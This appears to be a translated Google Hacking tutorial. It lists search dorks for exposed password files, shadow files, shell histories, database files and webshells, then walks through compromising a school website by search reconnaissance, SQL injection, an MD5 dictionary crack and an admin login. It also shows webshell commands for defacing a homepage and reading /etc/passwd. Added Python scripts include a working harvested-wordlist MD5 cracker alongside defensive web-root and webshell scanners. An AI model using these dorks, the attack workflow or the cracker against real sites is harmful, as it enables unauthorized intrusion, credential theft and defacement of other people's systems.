Google Hacking is not actually new. When it first came up, little attention was paid to the technique; it was seen as good for little more than turning up the odd webshell and of not much practical use. But Google Hacking is actually not so simple...
The basics of Google Hacking
Some of Google's search syntax can be used to dig up more information for us (and, of course, is just as useful to anyone who wants to attack more people). The common operators are described below.
intext:
Uses a string in the body of a web page as the search condition. For example, entering intext: followed by a word into Google returns every page whose body contains that word.
allintext: works the same way as intext.
intitle:
Like intext above, but searches page titles for the string we are looking for. For example, intitle:Security Angel returns every page whose title contains "Security Angel".
Likewise, allintitle: works the same way as intitle.
cache:
Searches Google's cached copy of a page. Sometimes you find good things there.
define:
Looks up the definition of a word. Searching define:hacker returns the definition of "hacker".
filetype:
This one I especially recommend: it searches for files of a given type. For example, entering filetype:doc returns the URLs of all files ending in .doc. And if you look for .bak, .mdb or .inc files instead, you can get even more interesting information.
info:
Queries basic information about the specified site.
inurl:
Searches for the given string inside URLs. For example, entering inurl:admin returns N links whose URL contains "admin".
link:
For example, searching link:www.4ngel.net returns all URLs that link to www.4ngel.net.
site:
Also very useful. For example, site:www.4ngel.net returns all URLs belonging to the 4ngel.net site.
By the way, a few operators are also very useful:
+ forces a word into the query that Google would otherwise ignore
- excludes a word
~ includes synonyms of a word
. single-character wildcard
* wildcard that can stand for several letters
"" exact-phrase query
Now for some actual applications.
The following queries are run on Google. For an attacker, password files are probably the most interesting target, and Google's powerful search often exposes exactly this kind of sensitive information to him. Use Google to search for the following:
intitle:"index of" etc
intitle:"index of" .sh_history
intitle:"index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
For various reasons, important password files sometimes end up exposed on the network without any protection. If someone with bad intentions gets hold of them, the damage is enormous.
Google can also be used to find sites running vulnerable programs. For example, a vulnerability was found in zeroboard some time ago, and attackers can use Google to find sites that run it:
intext:zeroboard filetype:php
Or:
inurl:outlogin.php?_zb_path= site:.jp
to find the pages we need. phpMyAdmin is a powerful database administration tool. Because some sites are misconfigured, phpMyAdmin can be operated directly without a password, and Google can find program URLs with this problem:
intitle:phpMyAdmin intext:"Create new database"
Also remember the old request http://www.xxx.com/_vti_bin/..%5... ystem32/cmd.exe?dir? Search for it on Google and you may well find plenty of antique machines. The same trick finds pages with other CGI vulnerabilities:
allinurl:winnt system32
As mentioned above, Google can search for database files, and some syntax can be combined to search more precisely (Access databases, MSSQL and MySQL connection files, and so on). For example:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data // often seen on misconfigured Apache + Win32 servers
By the same principle, Google can also be used to find admin backends.
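The dorks above all hit the same defender-side mistake: a web root that holds password files, backups, Access databases and .inc connection files, in directories that a misconfigured server will list. The script below is an added example, not code from the original article: it walks a web root and reports the files those "index of" and filetype: queries would surface, plus directories without an index page (the ones a server with directory listing on would expose). The sample tree it builds is constructed and the file names and the connection-string patterns it matches are assumptions taken from the queries in this article, not a complete list.

```python
import os
import re
import shutil
import tempfile

# File names the "index of" / filetype: dorks in this article go after.
SENSITIVE_NAME_RES = [
    re.compile(r"^\.(sh|bash)_history$"),
    re.compile(r"^(passwd|shadow|spwd|master\.passwd|\.?htpasswd|pwd\.db|people\.lst)$", re.I),
    re.compile(r"^service\.pwd$", re.I),
    re.compile(r"\.(bak|old|mdb|inc)$", re.I),
]
# Things an exposed .inc connection file usually carries (assumed patterns).
CONN_STRING_RE = re.compile(r"(provider|data source|user id|password|pwd)\s*=", re.I)
INDEX_NAMES = ("index.html", "index.htm", "index.php", "index.asp", "default.asp", "default.htm")


def audit_webroot(root):
    """Walk a web root and return sorted (kind, relative_path) findings."""
    findings = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        # No index page: a server with directory listing enabled would answer
        # with an "Index of /..." page here, which is what the dork searches for.
        if not any(f.lower() in INDEX_NAMES for f in filenames):
            findings.add(("listable-dir", rel_dir))
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if any(r.search(name) for r in SENSITIVE_NAME_RES):
                findings.add(("sensitive-name", rel))
            if name.lower().endswith(".inc"):
                with open(full, encoding="utf-8", errors="replace") as fh:
                    if CONN_STRING_RE.search(fh.read()):
                        findings.add(("connection-string", rel))
    return sorted(findings)


# Constructed sample tree (not a real site): the sort of layout that the
# allinurl:bbs data and filetype:inc conn queries turn up.
SAMPLE_FILES = {
    "index.html": "<html>home</html>",
    "data/bbs.mdb": "fake Access database",
    "inc/conn.inc": '<% ConnStr = "Provider=SQLOLEDB;Data Source=.;Password=secret" %>',
    "inc/footer.inc": '<% Response.Write "(c) school" %>',
    "admin/.htpasswd": "admin:$apr1$fake$hash",
    "backup/site.bak": "old copy of the site",
    "docs/index.htm": "<html>docs</html>",
    "docs/report.doc": "a word document",
}


def build_sample_webroot():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def run_demo():
    """Build the sample tree, audit it, remove it, and return the findings."""
    root = build_sample_webroot()
    try:
        return audit_webroot(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for kind, path in run_demo():
        print(f"{kind:18} {path}")
```

Run it against a real document root instead of the sample tree by calling audit_webroot("/var/www/html") (path assumed); anything it reports is a candidate for removal from the web root or for an explicit deny rule, and every listable-dir line is a reason to turn directory listing off.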
Google can be used both to gather information on a site and to penetrate it. Next we use Google to test a specific site.
First, use Google to look at some basic information about the site (some details omitted):
site:xxxx.com
From the results we find the domain names of several of the school's departments:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
A quick ping shows they are on different servers. Schools usually have a lot of good material, so first see whether there is anything good:
site:xxxx.com filetype:doc
That gets N useful .doc files.
Next look for the site's admin backend address:
site:xxxx.com intext:management
site:xxxx.com inurl:login
site:xxxx.com intitle:management
Two admin backend addresses come back:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
Not bad. Now check what programs the servers run:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:......
......
The A2 server runs IIS with an ASP site-wide program plus a PHP forum.
The A3 server is also IIS, running aspx and ASP. The web programs all look home-grown. Since there is a forum, see whether anyone has posted a public FTP account or the like:
site:a2.xxxx.com intext:ftp://*:*
Nothing valuable turns up. See whether there is an upload vulnerability:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
A file upload page is found on A2:
http://a2.xxxx.com/sys/uploadfile.asp
Opening it in IE: no access permission. Try injection instead.
site:a2.xxxx.com filetype:asp
That gives the addresses of N asp pages; let the tool do the grunt work. The program does not filter injection at all, and although db_owner privilege is not high, it is enough. I don't much like backing up a shell, and the database seems not small. The web administrator's password is recovered, but it is MD5-hashed. School site passwords are usually fairly regular, typically the domain name plus some variation of a phone number. Use Google to sort it out:
site:xxxx.com // gets N second-level domain names
site:xxxx.com intext:*@xxxx.com // gets N e-mail addresses
site:xxxx.com intext:phone // N phone numbers
Build a dictionary from this information together with the owner names of the e-mail addresses and run it slowly. After a while four accounts cracked: two from the student union, one administrator, and one that is probably a teacher's. Log in to the site:
name: website administrator
pass: a2xxxx7619 // as expected, domain name + 4 digits
How to escalate privileges from there is not something this article discusses.
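The dictionary step above (domain name and harvested names combined with phone-number fragments, then compared against the MD5 hash pulled from the database) is what the walkthrough describes but does not show. The script below is an added example, not the author's tool: it builds that wordlist from a constructed sample harvest (the domains, addresses and phone numbers are made up, not data from any real site) and looks a hash up in it. The choice of trailing four- and six-digit fragments and the stem+digits / digits+stem orderings are assumptions based on the pattern the walkthrough reports; the same generator doubles as a check on your own users' passwords before someone else runs it.

```python
import hashlib
import itertools
import re

# Constructed sample harvest, standing in for what the site:xxxx.com,
# intext:*@xxxx.com and intext:phone searches above returned. Not real data.
DOMAINS = ["xxxx.com", "a2.xxxx.com", "a3.xxxx.com"]
EMAILS = ["webmaster@a2.xxxx.com", "zhang.wei@xxxx.com", "lib@a3.xxxx.com"]
PHONES = ["010-8765-7619", "13912340042"]


def domain_stems(domains):
    """'a2.xxxx.com' -> 'a2xxxx' and 'xxxx': hostname labels with dots and TLD dropped."""
    stems = []
    for d in domains:
        labels = d.lower().split(".")[:-1]          # drop the TLD
        stems.append("".join(labels))               # a2xxxx
        stems.append(labels[-1])                    # xxxx
    return list(dict.fromkeys(stems))


def email_stems(emails):
    """Local parts and the name tokens inside them (zhang.wei -> zhang, wei)."""
    stems = []
    for e in emails:
        local = e.split("@", 1)[0].lower()
        stems.append(local)
        stems.extend(t for t in re.split(r"[._-]", local) if t)
    return list(dict.fromkeys(stems))


def phone_fragments(phones, lengths=(4, 6)):
    """Trailing digit groups of each number: the part of a phone number people reuse."""
    frags = []
    for p in phones:
        digits = re.sub(r"\D", "", p)
        frags.extend(digits[-n:] for n in lengths if len(digits) >= n)
    return list(dict.fromkeys(frags))


def build_wordlist(domains, emails, phones):
    """Stems alone, stem+digits and digits+stem, de-duplicated in a stable order."""
    stems = list(dict.fromkeys(domain_stems(domains) + email_stems(emails)))
    frags = phone_fragments(phones)
    words = list(stems)
    for stem, frag in itertools.product(stems, frags):
        words.append(stem + frag)
        words.append(frag + stem)
    return list(dict.fromkeys(words))


def md5_hex(word):
    """Unsalted MD5 hex digest, the format the walkthrough's admin table used."""
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(target_hex, wordlist):
    """Return the word whose MD5 matches target_hex, or None if no candidate does."""
    target = target_hex.lower()
    for w in wordlist:
        if md5_hex(w) == target:
            return w
    return None


if __name__ == "__main__":
    words = build_wordlist(DOMAINS, EMAILS, PHONES)
    print(len(words), "candidates; first few:", words[:6])
    # The walkthrough's recovered password, hashed here only to show the lookup.
    print(crack_md5(md5_hex("a2xxxx7619"), words))
```

With a few dozen harvested addresses and numbers the list stays small enough to try in seconds, which is the point: an unsalted MD5 of "domain + four digits" offers no real protection once the site itself has published the ingredients.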
Recently I looked at some Google hacking research sites abroad. Almost all of it is flexible use of the basic syntax, or combining it with a script vulnerability; what it mainly depends on is flexible thinking. Neither abroad nor at home are there many defensive measures against Google hacking, so there is no point struggling against it. Web administrators running Apache on Windows in particular should pay attention to this: a single intitle:"index of" search turns almost all of them up (in Apache, Options -Indexes in the server or directory configuration turns the listing off).
1. Searching for PHP webshells
intitle:"php shell*" "enable stderr" filetype:php
(Note: intitle is the page title; enable stderr refers to the Unix standard error stream; filetype is the file type.) In the search results you can find many command-line webshells. If you don't know how to use the phpshell you find and are not familiar with Unix, you can still just read the listing; it is not covered in detail here but has plenty of value. Some of the phpshells found this way run Unix commands, and all of them go through system calls (Baidu and other search engines can be used as well, just with different search terms). This kind of php webshell can run commands directly (common Unix commands). One line:
echo "summon" > index.jsp
Now look at the homepage: it has been changed to "summon".
You can also use wget to fetch a file (for example, the page you want to replace it with), then run cat file > index.html or echo "" > file
echo "test" > file
and the site's homepage is replaced. You can also run
uname -a; cat /etc/passwd
Note, however, that some webshells cannot execute commands at all because of problems on their side.
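From the defender's side, the shells this dork finds all share one shape: request input handed straight to system(), exec(), passthru(), shell_exec() or the backtick operator. The scanner below is an added example, not code from the original article or any existing tool: it flags PHP source with that shape. It is a crude heuristic (legitimate admin scripts that run commands from user input will trip it, and obfuscated shells that assemble the function name at runtime will not), so treat a hit as something to read, not as proof. The PHP snippets it scans are constructed samples, and the list of execution functions is an assumption, not exhaustive.

```python
import re

# Functions a command-line PHP shell hands its input to (assumed, not exhaustive).
EXEC_CALL_RE = re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(", re.I)
# Request input the shell reads the command from.
REQUEST_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# Backtick operator with a variable inside: `$cmd` also runs a shell command.
BACKTICK_RE = re.compile(r"`[^`\n]*\$\w+[^`\n]*`")


def scan_php(source):
    """Return [(line_no, reason)] for every line that executes a command."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        if EXEC_CALL_RE.search(line):
            reason = "exec-from-request" if REQUEST_RE.search(line) else "exec-call"
            hits.append((n, reason))
        if BACKTICK_RE.search(line):
            hits.append((n, "backtick-exec"))
    return hits


def is_webshell(source):
    """Heuristic: command execution plus request input somewhere in the same file."""
    hits = scan_php(source)
    if any(reason == "exec-from-request" for _, reason in hits):
        return True
    return bool(hits) and REQUEST_RE.search(source) is not None


# Constructed samples, not files taken from any real site.
SAMPLE_SHELL = '<?php\nif (isset($_GET["cmd"])) { echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; }\n?>'
SAMPLE_SPLIT = "<?php\n$c = $_POST['c'];\necho `$c`;\n?>"
SAMPLE_BENIGN = '<?php\n$load = shell_exec("uptime");\necho htmlspecialchars($load);\n?>'
SAMPLE_PLAIN = '<?php\necho "Hello " . htmlspecialchars($_GET["name"]);\n?>'


def scan_samples():
    """Verdict for each constructed sample, keyed by name."""
    samples = [("shell", SAMPLE_SHELL), ("split", SAMPLE_SPLIT),
               ("benign", SAMPLE_BENIGN), ("plain", SAMPLE_PLAIN)]
    return {name: is_webshell(src) for name, src in samples}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:7} webshell={verdict}")
```

Point scan_php at the contents of each .php file under a document root (the file walk is left to the caller) and review every file with an exec-from-request or backtick-exec hit; a stray shell found this way is the same one the search engine has probably already indexed.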
2. Searching for sensitive .inc information
In the Google search box, enter:
.org filetype:inc